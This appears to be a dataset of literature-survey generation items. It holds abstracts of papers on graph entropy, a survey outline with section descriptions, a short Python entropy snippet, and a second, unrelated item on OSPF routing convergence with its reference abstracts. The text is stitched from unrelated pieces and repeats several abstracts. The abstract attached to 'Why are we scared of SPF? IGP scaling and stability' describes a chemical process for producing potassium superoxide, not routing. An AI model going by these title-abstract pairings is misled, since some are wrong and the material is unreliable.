In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: A note on the von Neumann entropy of random graphs paper_content: Abstract In this note, we consider the von Neumann entropy of a density matrix obtained by normalizing the combinatorial Laplacian of a graph by its degree sum. We prove that the von Neumann entropy of the typical Erdos–Renyi random graph saturates its upper bound. Since connected regular graphs saturate this bound as well, our result highlights a connection between randomness and regularity. A general interpretation of the von Neumann entropy of a graph is an open problem. --- paper_title: Complexity of networks II: The set complexity of edge-colored graphs paper_content: We previously introduced the concept of “set-complexity,” based on a context-dependent measure of information, and used this concept to describe the complexity of gene interaction networks. In a previous paper of this series we analyzed the set-complexity of binary graphs. Here, we extend this analysis to graphs with multicolored edges that more closely match biological structures like the gene interaction networks. All highly complex graphs by this measure exhibit a modular structure. A principal result of this work is that for the most complex graphs of a given size the number of edge colors is equal to the number of “modules” of the graph. Complete multipartite graphs (CMGs) are defined and analyzed. The relation between complexity and structure of these graphs is examined in detail. We establish that the mutual information between any two nodes in a CMG can be fully expressed in terms of entropy, and present an explicit expression for the set complexity of CMGs (Theorem 3). An algorithm for generating highly complex graphs from CMGs is described. We establish several theorems relating these concepts and connecting complex graphs with a variety of practical network properties. In exploring the relation between symmetry and complexity we use the idea of a similarity matrix and its spectrum for highly complex graphs. © 2012 Wiley Periodicals, Inc. Complexity, 2012 © 2012 Wiley Periodicals, Inc. --- paper_title: Structural information content of networks: Graph entropy based on local vertex functionals paper_content: In this paper we define the structural information content of graphs as their corresponding graph entropy. This definition is based on local vertex functionals obtained by calculating j-spheres via the algorithm of Dijkstra. We prove that the graph entropy and, hence, the local vertex functionals can be computed with polynomial time complexity enabling the application of our measure for large graphs. In this paper we present numerical results for the graph entropy of chemical graphs and discuss resulting properties. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. 
Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. --- paper_title: On Entropy-based Molecular Descriptors : Statistical Analysis of Real and Synthetic Chemical Structures paper_content: This paper presents an analysis of entropy-based molecular descriptors. Specifically, we use real chemical structures, as well as synthetic isomeric structures, and investigate properties of and among descriptors with respect to the used data set by a statistical analysis. Our numerical results provide evidence that synthetic chemical structures are notably different to real chemical structures and, hence, should not be used to investigate molecular descriptors. Instead, an analysis based on real chemical structures is favorable. Further, we find strong hints that molecular descriptors can be partitioned into distinct classes capturing complementary information. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Novel topological descriptors for analyzing biological networks paper_content: Background ::: Topological descriptors, other graph measures, and in a broader sense, graph-theoretical methods, have been proven as powerful tools to perform biological network analysis. However, the majority of the developed descriptors and graph-theoretical methods does not have the ability to take vertex- and edge-labels into account, e.g., atom- and bond-types when considering molecular graphs. Indeed, this feature is important to characterize biological networks more meaningfully instead of only considering pure topological information. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. 
Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming at an understanding of information processing in complex networks. --- paper_title: Inequalities for entropy-based measures of network information content paper_content: This paper presents a method for establishing relations between entropy-based measures applied to graphs. A special class of relations called implicit information inequalities or implicit entropy bounds is developed. A number of entropy-based measures of the structural information content of a graph have been developed over the past several decades, but little attention has been paid to relations among these measures. The research reported here aims to remedy this deficiency. --- paper_title: Uniquely Discriminating Molecular Structures Using Novel Eigenvalue-Based Descriptors paper_content: In this article, we explore novel spectra-based descriptors to discriminate molecular graphs. As is known, classical structure descriptors based on the eigenvalues of the underlying adjacency matrix are often insufficient since there exist a large number of isospectral graphs. Briefly recall that the spectrum is the set of eigenvalues of the characteristic polynomial. To tackle the problem, we propose five families of novel descriptors based on the eigenvalues of certain molecular matrices representing chemical structures. Note that in this paper, we only consider the underlying skeleton of a molecular graph. Because it is crucial to study the discrimination power (often called degeneracy) by not merely using synthetic (isomeric) structures, we apply the novel measures to both real and synthetic molecular graphs. Also, we use ten different types of molecular matrices to calculate the novel descriptors and determine correlations between them. It turns out that the novel descriptors possess high discrimination power when applied to appropriate molecular matrices. Evidently, the study also reveals that special kinds of matrices capture structural information of the molecular graphs more meaningfully than others, particularly the adjacency matrix, which often turned out to be insufficient to develop molecular descriptors. --- paper_title: Exploring Statistical and Population Aspects of Network Complexity paper_content: The characterization and the definition of the complexity of objects is an important but very difficult problem that has attracted much interest in many different fields. In this paper we introduce a new measure, called the network diversity score (NDS), which allows us to quantify structural properties of networks. We demonstrate numerically that our diversity score is capable of distinguishing ordered, random and complex networks from each other and, hence, allows us to categorize networks with respect to their structural complexity. We study 16 additional network complexity measures and find that none of these measures has similarly good categorization capabilities.
In contrast to many other measures suggested so far aiming for a characterization of the structural complexity of networks, our score is different for a variety of reasons. First, our score is multiplicatively composed of four individual scores, each assessing different structural properties of a network. That means our composite score reflects the structural diversity of a network. Second, our score is defined for a population of networks instead of individual networks. We will show that this removes an unwanted ambiguity, inherently present in measures that are based on single networks. In order to apply our measure practically, we provide a statistical estimator for the diversity score, which is based on a finite number of samples. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG), whose topology can be found in numerous problems representing, e.g., temporal, spatial or general process structures of systems. For this graph class we show that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information, establishing an information theory for this graph class. Furthermore, we provide conditions under which these constrained probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently, which is a prerequisite for every large scale practical application, and show some numerical examples. ---
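The UHG measures in the last abstract reduce to the standard entropy, joint entropy and mutual information of two discrete distributions (one over node classes, one over edge classes). The following minimal Python illustration shows only these textbook quantities; the joint distribution is an invented toy example, not data from the cited paper.

import math

def H(probs):
    # Shannon entropy (in bits) of a probability vector.
    return -sum(p * math.log2(p) for p in probs if p > 0)

# Toy joint distribution over (node-class, edge-class) pairs, illustrative values only.
joint = {("a", "x"): 0.25, ("a", "y"): 0.25, ("b", "x"): 0.40, ("b", "y"): 0.10}

px, py = {}, {}
for (i, j), p in joint.items():          # marginal distributions
    px[i] = px.get(i, 0.0) + p
    py[j] = py.get(j, 0.0) + p

H_X, H_Y, H_XY = H(px.values()), H(py.values()), H(joint.values())
print(H_X, H_Y, H_XY, H_X + H_Y - H_XY)  # last term is the mutual information I(X;Y)

Mutual information computed this way is always non-negative and vanishes exactly when the two marginal distributions are independent.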
Title: A Survey of Recent Results in (Generalized) Graph Entropies Section 1: Introduction Description 1: Introduce the concept of graph entropy and its applications in various fields. Provide a historical overview and different approaches to measure graph entropy. Section 2: Inequalities and extremal properties on (generalized) graph entropies Description 2: Discuss the identity and inequality relationships between distinct graph entropies and study the extremal properties of graph entropies. Section 3: Inequalities for classical graph entropies and parametric measures Description 3: Present the bounds for special graph classes and study interrelations among classical and parametric graph entropy measures. Section 4: Graph entropy inequalities with information functions f_V, f_P, and f_C Description 4: Define information functions based on metrical properties and vertex centrality measures and derive related graph entropy measures. Section 5: Information theoretic measures of UHG graphs Description 5: Define and study the vertex and edge entropy of Universal Hierarchical Graphs (UHG) and their extremal properties. Section 6: Bounds for the entropies of rooted trees and generalized trees Description 6: Introduce and derive bounds for entropies of hierarchical and generalized trees, considering special classes of rooted trees. Section 7: Information inequalities for I_f(G) based on different information functions Description 7: Discuss closed-form expressions, bounds, and information inequalities of graph entropies based on specific information functions. Section 8: Extremal properties of degree-based and distance-based graph entropies Description 8: State the extremal properties of graph entropies based on degree powers and number of vertices at specific distances. Section 9: Extremality of I_f_lambda(G), I_f_2(G), I_f_3(G) and entropy bounds for dendrimers Description 9: Define specific graph entropies I_f_lambda(G), I_f_2(G), and I_f_3(G), and present their extremal properties and bounds for dendrimers. Section 10: Sphere-regular graphs and the extremality entropies I_f_2(G) and I_f_sigma(G) Description 10: Define sphere-regular graphs and study the properties and maximal graphs for sphere-function-based entropies. Section 11: Information inequalities for generalized graph entropies Description 11: Establish formal relationships between Shannon and Rényi entropies, and between classical and partition-independent entropy measures. Present bounds and inequalities for special graph classes and information functions. Section 12: Relationships between graph structures, graph energies, topological indices and generalized graph entropies Description 12: Introduce generalized graph entropies based on graph matrices, and explore their relationships with graph energies, spectral moments, and topological indices. Section 13: Summary and conclusion Description 13: Summarize the survey, highlighting the extremal properties, applications, and relationships among different (generalized) graph entropy measures. Mention open problems and conjectures for further research.
Improving Convergence Speed and Scalability in OSPF: A Survey
9
--- paper_title: The Birth of Link-State Routing paper_content: ‘‘Routing is a hard problem.’’ That’s what colleagues told me when I joined BBN in 1971, right after getting my undergraduate and master’s degrees in computer science at Harvard University. As a student, I had built the hardware and software to connect Harvard’s first interactive computer, the DEC PDP-1, to the infant Arpanet (the first packet switching computer network and precursor of the Internet). I had also taken a Harvard course taught by two senior BBN engineers who built the original interface message processors (IMPs), the switching nodes that routed traffic across the network. While at BBN, and with almost all the course requirements for a PhD in hand, it was time to find a possible dissertation topic. So I was glad to learn that dynamic routing—determining the best paths for network traffic in real time—was considered a difficult computer science issue because I planned to tackle it. By 1971, the Arpanet had been up and running long enough to disclose shortcomings in the performance and stability of the original design. My job at BBN was to redesign and rewrite all the software for the IMP, not just the routing module. I fondly recall releasing new IMP software to the whole network (amounting to a few dozen nodes at the time) every other Tuesday morning for two years. Fifty software versions later, the IMPs had more stable congestion management, better reliability, and higher throughput. But routing still remained a challenging area for further study. By the end of 1974 I had completed my PhD dissertation for Harvard on routing while working full-time at BBN. This dissertation described the problem, analyzed and compared many routing algorithms, and pointed out topics for further work, such as hierarchical routing for networks of networks. But I had not resolved some of the nagging network accidents, outages, and other crises caused by the original Arpanet routing system. --- paper_title: On the building blocks of quality of service in heterogeneous IP networks paper_content: After more than a decade of active research on Quality of Service in IP networks and the Internet, the majority of IP traffic relies on the conventional best-effort IP service model. Nevertheless, some QoS mechanisms are deployed in current networking infrastructures, while emerging applications pose QoS challenges. This survey brings into the foreground a broad range of research results on Quality of Service in IP-based networks. First, a justification of the need for QoS is provided, along with challenges stemming from the convergence of IP and wireless networks and the proliferation of QoS-demanding IP applications (such as VoIP). It is also emphasized that a global uniform end-to-end IP QoS solution is not realistic. Based on this remark, packet-level QoS mechanisms are classified as certain building blocks, each one fulfilling different objectives in certain parts of a heterogeneous IP network. This taxonomy, being in line with the ITU-T initiative toward a QoS architectural framework for IP networks, gives rise to a thorough presentation of QoS “building blocks,” as well as their associated mechanisms. This presentation is followed by an illustration of how the various building blocks are combined in the scope of modern IP networks. However, offering QoS in a large scale IP-based network demands that additional (i.e. non-packet-level) QoS mechanisms are deployed in some parts. 
Therefore, we also present prominent technologies and mechanisms devised to augment the QoS capabilities of access, wireless, and optical networks. We illustrate how these mechanisms boost end-to-end QoS solutions and reveal interworking issues with packet-level mechanisms. --- paper_title: A survey of QoS routing solutions for mobile ad hoc networks paper_content: In mobile ad hoc networks (MANETs), the provision of quality of service (QoS) guarantees is much more challenging than in wireline networks, mainly due to node mobility, multihop communications, contention for channel access, and a lack of central coordination. QoS guarantees are required by most multimedia and other time- or error-sensitive applications. The difficulties in the provision of such guarantees have limited the usefulness of MANETs. However, in the last decade, much research attention has focused on providing QoS assurances in MANET protocols. The QoS routing protocol is an integral part of any QoS solution since its function is to ascertain which nodes, if any, are able to serve applications? requirements. Consequently, it also plays a crucial role in data session admission control. This document offers an up-to-date survey of most major contributions to the pool of QoS routing solutions for MANETs published in the period 1997?2006. We include a thorough overview of QoS routing metrics, resources, and factors affecting performance and classify the protocols found in the literature. We also summarize their operation and describe their interactions with the medium access control (MAC) protocol, where applicable. This provides the reader with insight into their differences and allows us to highlight trends in protocol design and identify areas for future research. --- paper_title: Voice over the internet: A tutorial discussing problems and solutions associated with alternative transport paper_content: This article provides a tutorial overview of voice over the Internet, examining the effects of moving voice traffic over the packet switched Internet and comparing this with the effects of moving voice over the more traditional circuit-switched telephone system. The emphasis of this document is on areas of concern to a backbone service provider implementing Voice over IP (VoIP). We begin by providing overviews of the Plain Old Telephone Service (POTS) and VoIP. We then discuss techniques service providers can use to help preserve service quality on their VoIP networks. Next, we briefly discuss Voice over ATM (VoATM) as an alternative to VoIP. Finally, we offer some conclusions. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. 
The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: ::: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. ::: Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. ::: You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: ::: OSPF areas and virtual links NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments OSPF configuration and management Interaction with other routing protocols OSPF cryptographic authentication OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF) An OSPF FAQ ::: ::: IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. ::: You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: Outage Analysis of a University Campus Network paper_content: Understanding outage and failure characteristics of a network is important to assess the availability of the network, determine failure source for trouble-shooting, and identify weak areas for network availability improvement. However, there has been virtually no failure measurement and analysis on access networks. In this paper, we carry out an in-depth outage and failure analysis of a university campus network using a rich set of both node outage and link failure data. 
We investigate the aspects of spatial and temporal localities of failures and outages, the relation of link failure and node outage, and the impact of the hierarchical and redundant network design on outage. We find most of link failure events are not caused by node failures; frequent link up-down events may not lead to the corresponding node's outage; for access layer switches that connect to end hosts, their link up-down events exhibit periodic patterns. --- paper_title: Optical Layer Monitoring Schemes for Fast Link Failure Localization in All-Optical Networks paper_content: Optical layer monitoring and fault localization serves as a critical functional module in the control and management of optical networks. An efficient monitoring scheme aims at minimizing not only the hardware cost required for 100% link failure localization, but also the number of redundant alarms and monitors such that the network fault management can be simplified as well. In recent years, several optical layer monitoring schemes were reported for fast and efficient link failure localization, including simple, non-simple monitoring cycle (m-cycle) and monitoring trail (m-trail). Optimal ILP (Integer Linear Program) models and heuristics were also proposed with smart design philosophy on flexibly trading off different objectives. This article summarizes those innovative ideas and methodologies with in-depth analysis on their pros and cons. We also provide insights on future research topics in this area, as well as possible ways for extending the new failure localization approaches to other network applications. --- paper_title: Impact of link failures on VoIP performance paper_content: We use active and passive traffic measurements to identify the issues involved in the deployment of a voice service over a tier-1 IP backbone network. Our findings indicate that no specific handling of voice packets (i.e. QoS differentiation) is needed in the current backbone but new protocols and mechanisms need to be introduced to provide a better protection against link failures. We discover that link failures may be followed by long periods of routing instability, during which packets can be dropped because forwarded along invalid paths. We also identify the need for a new family of quality of service mechanisms based on fast protection of traffic and high availability of the service rather than performance in terms of delay and loss. --- paper_title: Characterization of Failures in an Operational IP Backbone Network paper_content: As the Internet evolves into a ubiquitous communication infrastructure and supports increasingly important services, its dependability in the presence of various failures becomes critical. In this paper, we analyze IS-IS routing updates from the Sprint IP backbone network to characterize failures that affect IP connectivity. Failures are first classified based on patterns observed at the IP-layer; in some cases, it is possible to further infer their probable causes, such as maintenance activities, router-related and optical layer problems. Key temporal and spatial characteristics of each class are analyzed and, when appropriate, parameterized using well-known distributions. Our results indicate that 20% of all failures happen during a period of scheduled maintenance activities. Of the unplanned failures, almost 30% are shared by multiple links and are most likely due to router-related and optical equipment-related problems, respectively, while 70% affect a single link at a time. 
Our classification of failures reveals the nature and extent of failures in the Sprint IP backbone. Furthermore, our characterization of the different classes provides a probabilistic failure model, which can be used to generate realistic failure scenarios, as input to various network design and traffic engineering problems. --- paper_title: Stability issues in OSPF routing paper_content: We study the stability of the OSPF protocol under steady state and perturbed conditions. We look at three indicators of stability, namely, (a) network convergence times, (b) routing load on processors, and (c) the number of route flaps. We study these statistics under three different scenarios: (a) on networks that deploy OSPF with TE extensions, (b) on networks that use subsecond HELLO timers, and (c) on networks that use alternative strategies for refreshing link-state information. Our results are based on a very detailed simulation of a real ISP network with 292 nodes and 765 links. --- paper_title: Network Recovery: Protection and Restoration of Optical, SONET-SDH, IP, and MPLS paper_content: Chapter 1: Introduction 1.1 Communications networks today 1.2 Network reliability 1.3 Different phases in a recovery process 1.4 Performance of recovery mechanisms: criteria 1.5 Classification of single-layer recovery mechanisms 1.6 Multi-layer recovery 1.7 Conclusion Chapter 2: SONET-SDH 2.1 Introduction: transmission networks 2.2 SDH and SONET Networks 2.3 Operational aspects 2.4 Ring protection 2.5 Linear Protection 2.6 Restoration 2.7 Case study 2.8 Summary 2.9 Recommended reference work and research-related topics Chapter 3: Optical Networks 3.1 Evolution of the optical network layer 3.2. The Optical Transport Network 3.3 Fault detection and propagation 3.4 Recovery in optical networks 3.5 Recovery mechanisms in ring-based optical networks 3.6 Recovery mechanisms in mesh-based optical networks 3.7 Ring-based versus mesh-based recovery schemes 3.8 Availability 3.9 Som recent trends in research 3.10 Summary Chapter 4: IP Routing 4.1 IP routing protocols 4.2 Analysis of the IP recovery cycle 4.3 Failure profile and fault detection 4.4 Dampening algorithms 4.5 FIS propagation (LSA origination and flooding) 4.6 Route computation 4.7 Temporary loops during network states changes 4.8 Load balancing 4.9 QOS guarantees during failure 4.10 Non Stop Forwarding: an example with OSPF 4.11 A case study with IS-IS 4.12 Summary 4.13 Algorithm complexity 4.14 Incremental SPF 4.15 Interaction between fast IGP convergence and NSF 4.16 Research related topics Chapter 5: MPLS Traffic Engineering 5.1 MPLS Traffic Engineering refresher 5.2. Analysis of the recovery cycle 5.3. MPLS Traffic Engineering global default restoration 5.4 MPLS Traffic engineering global path protection 5.5 MPLS Traffic Engineering local protection 5.6. Another MPLS Traffic Engineering recovery alternative 5.7. 
Load balancing 5.8 Comparison of global protection and local protection 5.9 Revertive versus non revertive modes 5.10 Failure profiles and fault detection 5.11 Case Studies 5.12 Standardization 5.13 Summary 5.14 RSVP signaling extensions for MPLS TE local protection 5.15 Backup path computation 5.16 Research related topics Chapter 6 Multi-Layer Networks 6.1 ASON / GMPLS networks 6.2 Generic multi-layer recovery approaches 6.3 Case studies 6.4 Conclusion 6.5 References --- paper_title: Achieving faster failure detection in OSPF networks paper_content: A network running OSPF takes several tens of seconds to recover from a failure, using the current default parameter settings. The main component of this delay is the time required to detect a failure using the hello protocol. Reducing the value of the hellointerval can speed up the failure detection time. However, too small a value of the hellointerval can result in an increase in network congestion, potentially causing multiple consecutive hellos to be lost. This can lead to a false breakdown of adjacencies between routers. Such false alarms not only disrupt network traffic by causing unnecessary routing changes, but also increase the processing load on the routers, which may potentially lead to routing instability. In this paper, we investigate the following question - what is the optimal value for the hellointerval that will lead to fast failure detection in the network, while keeping occurrences of false alarms within acceptable limits? We examine the impact of both network congestion and the network topology on the optimal value for the hellointerval. Additionally, we investigate the effectiveness of faster failure detection in achieving fast failure recovery in OSPF networks. --- paper_title: The Birth of Link-State Routing paper_content: ‘‘Routing is a hard problem.’’ That’s what colleagues told me when I joined BBN in 1971, right after getting my undergraduate and master’s degrees in computer science at Harvard University. As a student, I had built the hardware and software to connect Harvard’s first interactive computer, the DEC PDP-1, to the infant Arpanet (the first packet switching computer network and precursor of the Internet). I had also taken a Harvard course taught by two senior BBN engineers who built the original interface message processors (IMPs), the switching nodes that routed traffic across the network. While at BBN, and with almost all the course requirements for a PhD in hand, it was time to find a possible dissertation topic. So I was glad to learn that dynamic routing—determining the best paths for network traffic in real time—was considered a difficult computer science issue because I planned to tackle it. By 1971, the Arpanet had been up and running long enough to disclose shortcomings in the performance and stability of the original design. My job at BBN was to redesign and rewrite all the software for the IMP, not just the routing module. I fondly recall releasing new IMP software to the whole network (amounting to a few dozen nodes at the time) every other Tuesday morning for two years. Fifty software versions later, the IMPs had more stable congestion management, better reliability, and higher throughput. But routing still remained a challenging area for further study. By the end of 1974 I had completed my PhD dissertation for Harvard on routing while working full-time at BBN.
This dissertation described the problem, analyzed and compared many routing algorithms, and pointed out topics for further work, such as hierarchical routing for networks of networks. But I had not resolved some of the nagging network accidents, outages, and other crises caused by the original Arpanet routing system. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Improving OSPF dynamics on a broadcast LAN paper_content: In this paper, we analyze OSPF's interface state machine and propose modifications in order to reduce the time/processing requirements of the leader election process in a broadcast LAN environment. The proposed modifications are based on dynamic adjustment of wait time duration rather than using a static value. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Multi-point Relaying Techniques with OSPF on Ad Hoc Networks paper_content: Incorporating multi-hop ad hoc wireless networks in the IP infrastructure is an effort to which a growing community participates.
One instance of such activity is the extension of the most widely deployed interior gateway routing protocol on the Internet, OSPF (Open Shortest Path First), for operation on Mobile Ad hoc Networks (MANETs). Such extension allows OSPF to work on heterogeneous networks encompassing both wired and wireless routers, which may self-organize as multi-hop wireless subnetworks, and be mobile. Three solutions have been proposed for this extension, among which two based on techniques derived from multi-point relaying (MPR). This paper analyzes these two approaches and identifies some fundamental discussion items that pertain to adapting OSPF mechanisms to multihop wireless networking, before concluding with a proposal for a unique, merged solution based on this analysis. --- paper_title: Improving OSPF dynamics on a broadcast LAN paper_content: In this paper, we analyze OSPF's interface state machine and propose modifications in order to reduce the time/processing requirements of the leader election process in a broadcast LAN environment. The proposed modifications are based on dynamic adjustment of wait time duration rather than using a static value. --- paper_title: On the building blocks of quality of service in heterogeneous IP networks paper_content: After more than a decade of active research on Quality of Service in IP networks and the Internet, the majority of IP traffic relies on the conventional best-effort IP service model. Nevertheless, some QoS mechanisms are deployed in current networking infrastructures, while emerging applications pose QoS challenges. This survey brings into the foreground a broad range of research results on Quality of Service in IP-based networks. First, a justification of the need for QoS is provided, along with challenges stemming from the convergence of IP and wireless networks and the proliferation of QoS-demanding IP applications (such as VoIP). It is also emphasized that a global uniform end-to-end IP QoS solution is not realistic. Based on this remark, packet-level QoS mechanisms are classified as certain building blocks, each one fulfilling different objectives in certain parts of a heterogeneous IP network. This taxonomy, being in line with the ITU-T initiative toward a QoS architectural framework for IP networks, gives rise to a thorough presentation of QoS “building blocks,” as well as their associated mechanisms. This presentation is followed by an illustration of how the various building blocks are combined in the scope of modern IP networks. However, offering QoS in a large scale IP-based network demands that additional (i.e. non-packet-level) QoS mechanisms are deployed in some parts. Therefore, we also present prominent technologies and mechanisms devised to augment the QoS capabilities of access, wireless, and optical networks. We illustrate how these mechanisms boost end-to-end QoS solutions and reveal interworking issues with packet-level mechanisms. --- paper_title: Voice over the internet: A tutorial discussing problems and solutions associated with alternative transport paper_content: This article provides a tutorial overview of voice over the Internet, examining the effects of moving voice traffic over the packet switched Internet and comparing this with the effects of moving voice over the more traditional circuit-switched telephone system. The emphasis of this document is on areas of concern to a backbone service provider implementing Voice over IP (VoIP). We begin by providing overviews of the Plain Old Telephone Service (POTS) and VoIP.
We then discuss techniques service providers can use to help preserve service quality on their VoIP networks. Next, we briefly discuss Voice over ATM (VoATM) as an alternative to VoIP. Finally, we offer some conclusions. --- paper_title: Optimal configuration of OSPF aggregates paper_content: Open shortest path first (OSPF) is a popular protocol for routing within an autonomous system (AS) domain. In this paper, we address the important practical problem of configuring OSPF aggregates to minimize the error in OSPF shortest path computations due to subnet aggregation. We first develop an optimal dynamic programming algorithm that, given an upper bound k on the number of aggregates to be advertised and a weight-assignment function for the aggregates, computes the k aggregates that result in the minimum cumulative error in the shortest path computations for all source-destination subnet pairs. Subsequently, we tackle the problem of assigning weights to OSPF aggregates such that the cumulative error in the computed shortest paths is minimized. We demonstrate that, while for certain special cases (e.g., unweighted cumulative error) efficient optimal algorithms for the weight-assignment problem can be devised, the general problem itself is /spl Nscr//spl Pscr/-hard. Consequently, we have to rely on search heuristics to solve the weight-assignment problem. To the best of our knowledge, our work is the first to address the algorithmic issues underlying the configuration of OSPF aggregates and to propose efficient configuration algorithms that are provably optimal for many practical scenarios. --- paper_title: Why are we scared of SPF? IGP scaling and stability paper_content: The present invention relates to a process for preparing high purity inorganic higher oxides of the alkali and alkaline earth metals by subjecting the hydroxide of the alkali or alkaline earth metal to a radio frequency discharge sustained in oxygen. The invention is particularly adaptable to the production of high purity potassium superoxide (KO2) by subjecting potassium hydroxide to glow discharge sustained in oxygen under the pressure of about 0.75 to 1.00 torr. --- paper_title: An efficient algorithm for OSPF subnet aggregation paper_content: Multiple addresses within an OSPF area can be aggregated and advertised together to other areas. This process is known as address aggregation and is used to reduce router computational overheads and memory requirements and to reduce the network bandwidth consumed by OSPF messages. The downside of address aggregation is that it leads to information loss and consequently sub-optimal (non-shortest path) routing of data packets. The resulting difference (path selection error) between the length of the actual forwarding path and the shortest path varies between different sources and destinations. This paper proves that the path selection error from any source to any destination can be bounded using only parameters describing the destination area. Based on this, the paper presents an efficient algorithm that generates the minimum number of aggregates subject to a maximum allowed path selection error. A major operational benefit of our algorithm is that network administrators can select aggregates for an area based solely on the topology of the area without worrying about remaining areas of the OSPF network. The other benefit is that the algorithm enables trade-offs between the number of aggregates and the bound on the path selection error. 
